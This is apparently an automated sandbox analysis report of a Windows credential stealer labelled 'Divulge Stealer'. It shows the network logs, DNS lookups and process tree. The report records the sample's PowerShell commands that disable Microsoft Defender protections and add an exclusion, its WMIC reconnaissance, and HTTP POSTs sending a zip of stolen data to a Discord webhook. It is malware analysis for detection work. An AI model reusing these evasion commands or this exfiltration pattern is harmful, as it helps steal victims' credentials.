                                                                                                                            Dec 11, 2024 08:40:18.088862896 CET49793443192.168.2.6162.159.138.232
                                                                                                                            Dec 11, 2024 08:40:18.088875055 CET44349793162.159.138.232192.168.2.6
                                                                                                                            Dec 11, 2024 08:40:18.088929892 CET49793443192.168.2.6162.159.138.232
                                                                                                                            Dec 11, 2024 08:40:18.088937044 CET44349793162.159.138.232192.168.2.6
                                                                                                                            Dec 11, 2024 08:40:18.088958025 CET49793443192.168.2.6162.159.138.232
                                                                                                                            Dec 11, 2024 08:40:18.088968992 CET44349793162.159.138.232192.168.2.6
                                                                                                                            Dec 11, 2024 08:40:18.088987112 CET49793443192.168.2.6162.159.138.232
                                                                                                                            Dec 11, 2024 08:40:18.088990927 CET44349793162.159.138.232192.168.2.6
                                                                                                                            Dec 11, 2024 08:40:18.089004993 CET49793443192.168.2.6162.159.138.232
                                                                                                                            Dec 11, 2024 08:40:18.089015007 CET44349793162.159.138.232192.168.2.6
                                                                                                                            Dec 11, 2024 08:40:18.089073896 CET49793443192.168.2.6162.159.138.232
                                                                                                                            Dec 11, 2024 08:40:18.089082003 CET49793443192.168.2.6162.159.138.232
                                                                                                                            Dec 11, 2024 08:40:18.089111090 CET49793443192.168.2.6162.159.138.232
                                                                                                                            Dec 11, 2024 08:40:18.089142084 CET49793443192.168.2.6162.159.138.232
                                                                                                                            Dec 11, 2024 08:40:18.089193106 CET49793443192.168.2.6162.159.138.232
                                                                                                                            Dec 11, 2024 08:40:18.089200974 CET49793443192.168.2.6162.159.138.232
                                                                                                                            Dec 11, 2024 08:40:18.089230061 CET49793443192.168.2.6162.159.138.232
                                                                                                                            Dec 11, 2024 08:40:18.089298964 CET49793443192.168.2.6162.159.138.232
                                                                                                                            Dec 11, 2024 08:40:18.089354992 CET49793443192.168.2.6162.159.138.232
                                                                                                                            Dec 11, 2024 08:40:18.089402914 CET49793443192.168.2.6162.159.138.232
                                                                                                                            Dec 11, 2024 08:40:18.089417934 CET49793443192.168.2.6162.159.138.232
                                                                                                                            Dec 11, 2024 08:40:18.089447021 CET49793443192.168.2.6162.159.138.232
                                                                                                                            Dec 11, 2024 08:40:18.131331921 CET44349793162.159.138.232192.168.2.6
                                                                                                                            Dec 11, 2024 08:40:18.131583929 CET49793443192.168.2.6162.159.138.232
                                                                                                                            Dec 11, 2024 08:40:18.131841898 CET49793443192.168.2.6162.159.138.232
                                                                                                                            Dec 11, 2024 08:40:18.131865025 CET49793443192.168.2.6162.159.138.232
                                                                                                                            Dec 11, 2024 08:40:18.131887913 CET49793443192.168.2.6162.159.138.232
                                                                                                                            Dec 11, 2024 08:40:18.131899118 CET49793443192.168.2.6162.159.138.232
                                                                                                                            Dec 11, 2024 08:40:18.131925106 CET49793443192.168.2.6162.159.138.232
                                                                                                                            Dec 11, 2024 08:40:18.131983042 CET49793443192.168.2.6162.159.138.232
                                                                                                                            Dec 11, 2024 08:40:18.132038116 CET49793443192.168.2.6162.159.138.232
                                                                                                                            Dec 11, 2024 08:40:18.132102013 CET49793443192.168.2.6162.159.138.232
                                                                                                                            Dec 11, 2024 08:40:18.132158041 CET49793443192.168.2.6162.159.138.232
                                                                                                                            Dec 11, 2024 08:40:18.150650024 CET44349793162.159.138.232192.168.2.6
                                                                                                                            Dec 11, 2024 08:40:18.150831938 CET49793443192.168.2.6162.159.138.232
                                                                                                                            Dec 11, 2024 08:40:18.151014090 CET49793443192.168.2.6162.159.138.232
                                                                                                                            Dec 11, 2024 08:40:18.151034117 CET49793443192.168.2.6162.159.138.232
                                                                                                                            Dec 11, 2024 08:40:18.195322037 CET44349793162.159.138.232192.168.2.6
                                                                                                                            Dec 11, 2024 08:40:18.195461988 CET49793443192.168.2.6162.159.138.232
                                                                                                                            Dec 11, 2024 08:40:18.239336014 CET44349793162.159.138.232192.168.2.6
                                                                                                                            Dec 11, 2024 08:40:19.509211063 CET44349793162.159.138.232192.168.2.6
                                                                                                                            Dec 11, 2024 08:40:19.509287119 CET44349793162.159.138.232192.168.2.6
                                                                                                                            Dec 11, 2024 08:40:19.509357929 CET49793443192.168.2.6162.159.138.232
                                                                                                                            Dec 11, 2024 08:40:19.509946108 CET49793443192.168.2.6162.159.138.232
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 11, 2024 08:39:45.486399889 CET | 52799 | 53 | 192.168.2.6 | 1.1.1.1
Dec 11, 2024 08:39:45.623785973 CET | 53 | 52799 | 1.1.1.1 | 192.168.2.6
Dec 11, 2024 08:40:14.413206100 CET | 59836 | 53 | 192.168.2.6 | 1.1.1.1
Dec 11, 2024 08:40:14.549686909 CET | 53 | 59836 | 1.1.1.1 | 192.168.2.6
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Dec 11, 2024 08:39:45.486399889 CET | 192.168.2.6 | 1.1.1.1 | 0xd60e | Standard query (0) | ip-api.com | A (IP address) | IN (0x0001) | false
Dec 11, 2024 08:40:14.413206100 CET | 192.168.2.6 | 1.1.1.1 | 0x6652 | Standard query (0) | discord.com | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 11, 2024 08:39:45.623785973 CET | 1.1.1.1 | 192.168.2.6 | 0xd60e | No error (0) | ip-api.com | | 208.95.112.1 | A (IP address) | IN (0x0001) | false
Dec 11, 2024 08:40:14.549686909 CET | 1.1.1.1 | 192.168.2.6 | 0x6652 | No error (0) | discord.com | | 162.159.138.232 | A (IP address) | IN (0x0001) | false
Dec 11, 2024 08:40:14.549686909 CET | 1.1.1.1 | 192.168.2.6 | 0x6652 | No error (0) | discord.com | | 162.159.137.232 | A (IP address) | IN (0x0001) | false
Dec 11, 2024 08:40:14.549686909 CET | 1.1.1.1 | 192.168.2.6 | 0x6652 | No error (0) | discord.com | | 162.159.135.232 | A (IP address) | IN (0x0001) | false
Dec 11, 2024 08:40:14.549686909 CET | 1.1.1.1 | 192.168.2.6 | 0x6652 | No error (0) | discord.com | | 162.159.128.233 | A (IP address) | IN (0x0001) | false
Dec 11, 2024 08:40:14.549686909 CET | 1.1.1.1 | 192.168.2.6 | 0x6652 | No error (0) | discord.com | | 162.159.136.232 | A (IP address) | IN (0x0001) | false
• discord.com
• ip-api.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.6 | 49720 | 208.95.112.1 | 80 | 6924 | C:\Users\user\Desktop\apDMcnqqWs.exe
Timestamp | Bytes transferred | Direction | Data
Dec 11, 2024 08:39:45.745012045 CET | 79 | OUT | GET /json/?fields=225545 HTTP/1.1
Host: ip-api.com
Connection: Keep-Alive
Dec 11, 2024 08:39:46.851389885 CET | 381 | IN | HTTP/1.1 200 OK
Date: Wed, 11 Dec 2024 07:39:45 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 204
Access-Control-Allow-Origin: *
X-Ttl: 42
X-Rl: 43
Data Raw: 7b 22 73 74 61 74 75 73 22 3a 22 73 75 63 63 65 73 73 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 22 72 65 67 69 6f 6e 4e 61 6d 65 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 22 74 69 6d 65 7a 6f 6e 65 22 3a 22 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 22 2c 22 72 65 76 65 72 73 65 22 3a 22 73 74 61 74 69 63 2d 63 70 65 2d 38 2d 34 36 2d 31 32 33 2d 31 37 35 2e 63 65 6e 74 75 72 79 6c 69 6e 6b 2e 63 6f 6d 22 2c 22 6d 6f 62 69 6c 65 22 3a 66 61 6c 73 65 2c 22 70 72 6f 78 79 22 3a 66 61 6c 73 65 2c 22 71 75 65 72 79 22 3a 22 38 2e 34 36 2e 31 32 33 2e 31 37 35 22 7d
Data Ascii: {"status":"success","country":"United States","regionName":"New York","timezone":"America/New_York","reverse":"static-cpe-8-46-123-175.centurylink.com","mobile":false,"proxy":false,"query":"8.46.123.175"}


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.6 | 49787 | 162.159.138.232 | 443 | 6924 | C:\Users\user\Desktop\apDMcnqqWs.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-11 07:40:15 UTC | 360 | OUT | POST /api/webhooks/1312882330339119204/DThrH97xNlw4juI_9g0e0fzDhrtHNdex_r-KkDBSRTms8TsaDB_AZHbN51MWJHNb9obG HTTP/1.1
Accept: application/json
User-Agent: Opera/9.80 (Windows NT 6.1; YB/4.0.0) Presto/2.12.388 Version/12.17
Content-Type: application/json; charset=utf-8
Host: discord.com
Content-Length: 886
Expect: 100-continue
Connection: Keep-Alive
2024-12-11 07:40:16 UTC | 886 | OUT | Data Raw: 7b 22 63 6f 6e 74 65 6e 74 22 3a 22 22 2c 22 65 6d 62 65 64 73 22 3a 5b 7b 22 74 69 74 6c 65 22 3a 22 44 69 76 75 6c 67 65 20 53 74 65 61 6c 65 72 22 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 2a 2a 5f 5f f0 9f 93 a1 4e 65 74 77 6f 72 6b 20 61 64 64 72 65 73 73 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 5f 5f 2a 2a 5c 6e 60 60 60 70 72 6f 6c 6f 67 5c 6e 49 50 3a 20 38 2e 34 36 2e 31 32 33 2e 31 37 35 5c 6e 5c 6e 43 6f 75 6e 74 72 79 3a 20 55 6e 69 74 65 64 20 53 74 61 74 65 73 5c 6e 52 65 67 69 6f 6e 3a 20 4e 65 77 20 59 6f 72 6b 5c 6e 54 69 6d 65 7a 6f 6e 65 3a 20 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 5c 6e 5c 6e 43 65 6c 6c 75 6c 61 72 20 44 61 74 61 3a 20 e2 9d 8e 5c 6e 50 72 6f 78 79 2f 56 50 4e 3a 20 20 20 20 20 e2 9d 8e 5c 6e 5c 6e 60 60 60
Data Ascii: {"content":"","embeds":[{"title":"Divulge Stealer","description":"**__Network address information__**\n```prolog\nIP: 8.46.123.175\n\nCountry: United States\nRegion: New York\nTimezone: America/New_York\n\nCellular Data: \nProxy/VPN: \n\n```
2024-12-11 07:40:16 UTC | 25 | IN | HTTP/1.1 100 Continue
2024-12-11 07:40:16 UTC | 1298 | IN | HTTP/1.1 404 Not Found
Date: Wed, 11 Dec 2024 07:40:16 GMT
Content-Type: application/json
Content-Length: 45
Connection: close
Cache-Control: public, max-age=3600, s-maxage=3600
strict-transport-security: max-age=31536000; includeSubDomains; preload
x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
x-ratelimit-limit: 5
x-ratelimit-remaining: 4
x-ratelimit-reset: 1733902817
x-ratelimit-reset-after: 1
via: 1.1 google
alt-svc: h3=":443"; ma=86400
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bamIwy83ZFT7y2v3CKu9aewld%2Bvk5ZsQZMYbwR82q9hjVS489nN5myUfGMi6m8s7NR0k3L2GBtHyahxHFoQMCpCskvCplEM5q4aEfLPag2PuRkRIG9qGb%2F2lMrBf"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
X-Content-Type-Options: nosniff
Set-Cookie: __cfruid=6c81c4fbb7ebff5ead0ba6483805c69b9b6a88d7-1733902816; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
Set-Cookie: _cfuvid=S3vmSPcTE6BGxcUZYj7Q0aQm8HDzs9bcDml18siBgC0-1733902816347-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
Server: cloudflare
CF-RAY: 8f03d3583d1b15a3-EWR
{"message": "Unknown Webhook", "code": 10015}


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            1192.168.2.649793162.159.138.2324436924C:\Users\user\Desktop\apDMcnqqWs.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-12-11 07:40:17 UTC531OUTPOST /api/webhooks/1312882330339119204/DThrH97xNlw4juI_9g0e0fzDhrtHNdex_r-KkDBSRTms8TsaDB_AZHbN51MWJHNb9obG HTTP/1.1
                                                                                                                            Accept: application/json
                                                                                                                            User-Agent: Opera/9.80 (Windows NT 6.1; YB/4.0.0) Presto/2.12.388 Version/12.17
                                                                                                                            Content-Type: multipart/form-data; boundary="bd313de6-b89a-44ba-9907-aa24c8ebcbff"
                                                                                                                            Host: discord.com
                                                                                                                            Cookie: __cfruid=6c81c4fbb7ebff5ead0ba6483805c69b9b6a88d7-1733902816; _cfuvid=S3vmSPcTE6BGxcUZYj7Q0aQm8HDzs9bcDml18siBgC0-1733902816347-0.0.1.1-604800000
                                                                                                                            Content-Length: 693111
                                                                                                                            Expect: 100-continue
                                                                                                                            2024-12-11 07:40:18 UTC  40 OUT  Data Raw: 2d 2d 62 64 33 31 33 64 65 36 2d 62 38 39 61 2d 34 34 62 61 2d 39 39 30 37 2d 61 61 32 34 63 38 65 62 63 62 66 66 0d 0a
                                                                                                                            Data Ascii: --bd313de6-b89a-44ba-9907-aa24c8ebcbff
                                                                                                                            2024-12-11 07:40:18 UTC  142 OUT  Data Raw: 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 7a 69 70 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 66 69 6c 65 3b 20 66 69 6c 65 6e 61 6d 65 3d 44 69 76 75 6c 67 65 2d 34 30 35 34 36 34 2e 7a 69 70 3b 20 66 69 6c 65 6e 61 6d 65 2a 3d 75 74 66 2d 38 27 27 44 69 76 75 6c 67 65 2d 34 30 35 34 36 34 2e 7a 69 70 0d 0a 0d 0a
                                                                                                                            Data Ascii: Content-Type: application/zip
                                                                                                                            Content-Disposition: form-data; name=file; filename=Divulge-405464.zip; filename*=utf-8''Divulge-405464.zip
                                                                                                                            2024-12-11 07:40:18 UTC  25 IN  HTTP/1.1 100 Continue
                                                                                                                            2024-12-11 07:40:19 UTC  1007 IN  HTTP/1.1 404 Not Found
                                                                                                                            Date: Wed, 11 Dec 2024 07:40:19 GMT
                                                                                                                            Content-Type: application/json
                                                                                                                            Content-Length: 45
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: public, max-age=3600, s-maxage=3600
                                                                                                                            strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                                                            x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
                                                                                                                            x-ratelimit-limit: 5
                                                                                                                            x-ratelimit-remaining: 4
                                                                                                                            x-ratelimit-reset: 1733902820
                                                                                                                            x-ratelimit-reset-after: 1
                                                                                                                            via: 1.1 google
                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Np5VDrvgrqvDRLxUx6%2BKmWV7%2FaPoUpfZCt6ORwhF4SyjuL8As8OIff8C5J7pYUXbLXdqDWBTdHrDCxISPv%2BxTAt47grRwFy5fZag0kYFnp5J78ATW8w%2Bzj4TZsNM"}],"group":"cf-nel","max_age":604800}
                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                            Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
                                                                                                                            Server: cloudflare
                                                                                                                            CF-RAY: 8f03d3647b820f71-EWR
                                                                                                                            {"message": "Unknown Webhook", "code": 10015}

                                                                                                                            Target ID:0
                                                                                                                            Start time:02:39:29
                                                                                                                            Start date:11/12/2024
                                                                                                                            Path:C:\Users\user\Desktop\apDMcnqqWs.exe
                                                                                                                            Wow64 process (32bit):false
                                                                                                                            Commandline:"C:\Users\user\Desktop\apDMcnqqWs.exe"
                                                                                                                            Imagebase:0x1ed082d0000
                                                                                                                            File size:190'464 bytes
                                                                                                                            MD5 hash:E09F55D421CB45340A8C97C217BA56CF
                                                                                                                            Has elevated privileges:true
                                                                                                                            Has administrator privileges:true
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Yara matches:
                                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000000.2102524227.000001ED082D2000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2596078793.000001ED0A0F2000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            Reputation:low
                                                                                                                            Has exited:true

                                                                                                                            Target ID:1
                                                                                                                            Start time:02:39:29
                                                                                                                            Start date:11/12/2024
                                                                                                                            Path:C:\Windows\System32\dllhost.exe
                                                                                                                            Wow64 process (32bit):false
                                                                                                                            Commandline:C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
                                                                                                                            Imagebase:0x7ff642ec0000
                                                                                                                            File size:21'312 bytes
                                                                                                                            MD5 hash:08EB78E5BE019DF044C26B14703BD1FA
                                                                                                                            Has elevated privileges:false
                                                                                                                            Has administrator privileges:false
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Reputation:moderate
                                                                                                                            Has exited:true

                                                                                                                            Target ID:2
                                                                                                                            Start time:02:39:33
                                                                                                                            Start date:11/12/2024
                                                                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                            Wow64 process (32bit):false
                                                                                                                            Commandline:"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\apDMcnqqWs.exe'
                                                                                                                            Imagebase:0x7ff6e3d50000
                                                                                                                            File size:452'608 bytes
                                                                                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                            Has elevated privileges:true
                                                                                                                            Has administrator privileges:true
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Reputation:high
                                                                                                                            Has exited:true

                                                                                                                            Target ID:3
                                                                                                                            Start time:02:39:33
                                                                                                                            Start date:11/12/2024
                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                            Wow64 process (32bit):false
                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                            Imagebase:0x7ff66e660000
                                                                                                                            File size:862'208 bytes
                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                            Has elevated privileges:true
                                                                                                                            Has administrator privileges:true
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Reputation:high
                                                                                                                            Has exited:true

                                                                                                                            Target ID:4
                                                                                                                            Start time:02:39:36
                                                                                                                            Start date:11/12/2024
                                                                                                                            Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                                                                                            Wow64 process (32bit):false
                                                                                                                            Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                                            Imagebase:0x7ff717f30000
                                                                                                                            File size:496'640 bytes
                                                                                                                            MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                                                                                            Has elevated privileges:true
                                                                                                                            Has administrator privileges:false
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Reputation:high
                                                                                                                            Has exited:true

                                                                                                                            Target ID:5
                                                                                                                            Start time:02:39:39
                                                                                                                            Start date:11/12/2024
                                                                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                            Wow64 process (32bit):false
                                                                                                                            Commandline:"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
                                                                                                                            Imagebase:0x7ff6e3d50000
                                                                                                                            File size:452'608 bytes
                                                                                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                            Has elevated privileges:true
                                                                                                                            Has administrator privileges:true
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Reputation:high
                                                                                                                            Has exited:true

                                                                                                                            Target ID:6
                                                                                                                            Start time:02:39:39
                                                                                                                            Start date:11/12/2024
                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                            Wow64 process (32bit):false
                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                            Imagebase:0x7ff66e660000
                                                                                                                            File size:862'208 bytes
                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                            Has elevated privileges:true
                                                                                                                            Has administrator privileges:true
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Reputation:high
                                                                                                                            Has exited:true

                                                                                                                            Target ID:7
                                                                                                                            Start time:02:39:45
                                                                                                                            Start date:11/12/2024
                                                                                                                            Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                            Wow64 process (32bit):false
                                                                                                                            Commandline:"wmic.exe" os get Caption
                                                                                                                            Imagebase:0x7ff68f5a0000
                                                                                                                            File size:576'000 bytes
                                                                                                                            MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                            Has elevated privileges:true
                                                                                                                            Has administrator privileges:true
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Reputation:high
                                                                                                                            Has exited:true

                                                                                                                            Target ID:8
                                                                                                                            Start time:02:39:45
                                                                                                                            Start date:11/12/2024
                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                            Wow64 process (32bit):false
                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                            Imagebase:0x7ff66e660000
                                                                                                                            File size:862'208 bytes
                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                            Has elevated privileges:true
                                                                                                                            Has administrator privileges:true
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Reputation:high
                                                                                                                            Has exited:true

                                                                                                                            Target ID:10
                                                                                                                            Start time:02:39:46
                                                                                                                            Start date:11/12/2024
                                                                                                                            Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                            Wow64 process (32bit):false
                                                                                                                            Commandline:"wmic.exe" computersystem get totalphysicalmemory
                                                                                                                            Imagebase:0x7ff68f5a0000
                                                                                                                            File size:576'000 bytes
                                                                                                                            MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                            Has elevated privileges:true
                                                                                                                            Has administrator privileges:true
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Reputation:high
                                                                                                                            Has exited:true

                                                                                                                            Target ID:11
                                                                                                                            Start time:02:39:46
                                                                                                                            Start date:11/12/2024
                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                            Wow64 process (32bit):false
                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                            Imagebase:0x7ff66e660000
                                                                                                                            File size:862'208 bytes
                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                            Has elevated privileges:true
                                                                                                                            Has administrator privileges:true
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Has exited:true

                                                                                                                            Target ID:12
                                                                                                                            Start time:02:39:47
                                                                                                                            Start date:11/12/2024
                                                                                                                            Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                            Wow64 process (32bit):false
                                                                                                                            Commandline:"wmic.exe" csproduct get uuid
                                                                                                                            Imagebase:0x7ff68f5a0000
                                                                                                                            File size:576'000 bytes
                                                                                                                            MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                            Has elevated privileges:true
                                                                                                                            Has administrator privileges:true
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Has exited:true

                                                                                                                            Target ID:13
                                                                                                                            Start time:02:39:47
                                                                                                                            Start date:11/12/2024
                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                            Wow64 process (32bit):false
                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                            Imagebase:0x7ff66e660000
                                                                                                                            File size:862'208 bytes
                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                            Has elevated privileges:true
                                                                                                                            Has administrator privileges:true
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Has exited:true

                                                                                                                            Target ID:14
                                                                                                                            Start time:02:39:48
                                                                                                                            Start date:11/12/2024
                                                                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                            Wow64 process (32bit):false
                                                                                                                            Commandline:"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
                                                                                                                            Imagebase:0x7ff6e3d50000
                                                                                                                            File size:452'608 bytes
                                                                                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                            Has elevated privileges:true
                                                                                                                            Has administrator privileges:true
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Has exited:true

                                                                                                                            Target ID:15
                                                                                                                            Start time:02:39:48
                                                                                                                            Start date:11/12/2024
                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                            Wow64 process (32bit):false
                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                            Imagebase:0x7ff66e660000
                                                                                                                            File size:862'208 bytes
                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                            Has elevated privileges:true
                                                                                                                            Has administrator privileges:true
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Has exited:true

                                                                                                                            Target ID:16
                                                                                                                            Start time:02:39:57
                                                                                                                            Start date:11/12/2024
                                                                                                                            Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                            Wow64 process (32bit):false
                                                                                                                            Commandline:"wmic" path win32_VideoController get name
                                                                                                                            Imagebase:0x7ff68f5a0000
                                                                                                                            File size:576'000 bytes
                                                                                                                            MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                            Has elevated privileges:true
                                                                                                                            Has administrator privileges:true
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Has exited:true

                                                                                                                            Target ID:17
                                                                                                                            Start time:02:39:57
                                                                                                                            Start date:11/12/2024
                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                            Wow64 process (32bit):false
                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                            Imagebase:0x7ff66e660000
                                                                                                                            File size:862'208 bytes
                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                            Has elevated privileges:true
                                                                                                                            Has administrator privileges:true
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Has exited:true

                                                                                                                            Target ID:18
                                                                                                                            Start time:02:39:58
                                                                                                                            Start date:11/12/2024
                                                                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                            Wow64 process (32bit):false
                                                                                                                            Commandline:"powershell.exe" Get-WmiObject -Namespace "Root\SecurityCenter2" -Class AntiVirusProduct | Select-Object -ExpandProperty displayName
                                                                                                                            Imagebase:0x7ff6e3d50000
                                                                                                                            File size:452'608 bytes
                                                                                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                            Has elevated privileges:true
                                                                                                                            Has administrator privileges:true
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Has exited:true

                                                                                                                            Target ID:19
                                                                                                                            Start time:02:39:58
                                                                                                                            Start date:11/12/2024
                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                            Wow64 process (32bit):false
                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                            Imagebase:0x7ff66e660000
                                                                                                                            File size:862'208 bytes
                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                            Has elevated privileges:true
                                                                                                                            Has administrator privileges:true
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Has exited:true

                                                                                                                              Execution Graph

                                                                                                                              Execution Coverage:15.2%
                                                                                                                              Dynamic/Decrypted Code Coverage:100%
                                                                                                                              Signature Coverage:100%
                                                                                                                              Total number of Nodes:3
                                                                                                                              Total number of Limit Nodes:0
                                                                                                                              execution_graph 42930 7ffd34a42b43 42931 7ffd34a42b56 CryptUnprotectData 42930->42931 42933 7ffd34a42c53 42931->42933

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
